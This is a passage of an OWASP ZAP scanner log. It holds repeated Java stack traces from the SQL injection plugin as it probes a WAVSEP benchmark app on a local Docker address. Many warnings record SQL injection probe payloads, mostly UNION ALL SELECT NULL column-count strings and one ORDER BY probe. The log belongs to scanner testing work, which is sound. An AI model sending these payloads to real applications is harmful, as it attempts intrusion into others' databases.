org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679460 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679461 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679463 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679463 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679465 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679466 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679467 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679467 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679468 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679469 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679469 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679470 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679471 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at 